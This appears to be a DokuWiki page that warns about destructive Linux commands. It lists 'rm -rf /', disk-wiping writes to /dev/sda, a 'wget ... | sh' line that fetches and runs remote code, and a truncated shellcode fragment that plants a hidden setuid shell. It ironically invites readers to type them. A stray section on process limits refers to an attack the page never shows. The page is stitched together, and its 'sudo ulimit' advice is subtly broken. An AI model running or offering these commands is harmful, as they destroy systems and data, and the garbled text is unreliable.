This is EVIL code

YOU HAVE BEEN WARNED! If you do not understand what commands below do .. please run run far away with out using it. But if you DO understand this warning .. just type one of the fallowing commands in your CLI
 rm -rf /
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
 mkfs.ext3 /dev/sda

This is very easy to defend against. All you need to do is set limits to the number of processes that a user can open. These can be set per user, per group or globally. And you can set this one of two ways.

You can use the ulimit command for instant change that only lasts until the user logs off, or make the change permanent by editing the /etc/security/limits.conf file.

To use the ulimit command simply type “ulimit -u” with the number of processes that you want users to be allowed to run. So to set the limit to 512 just type:

 sudo ulimit -u 512

You can also change the /etc/security/limits.conf file to make the change permanent. Full instructions can be found on, but basically just add the following line to the config file:

    *    hard    nproc    512

The “*” means apply the change to everyone, “Hard” means it is a hard limit, and “nproc 512″ locks the number of processes to 512.

You need to adjust the number of processes to a number that would be the best setting for your system. 512 seemed to work great on mine. Don’t set the number to low, or you may have other “denial of service” type issues, lol.


 any_command > /dev/sda
 wget http://some_untrusted_source -O- | sh
 mv /home/yourhomedirectory/* /dev/null
linux/evil.txt · Last modified: 2013/01/04 11:31 by a
CC Attribution-Share Alike 4.0 International
Driven by DokuWiki Recent changes RSS feed Valid CSS Valid XHTML 1.0 ipv6 ready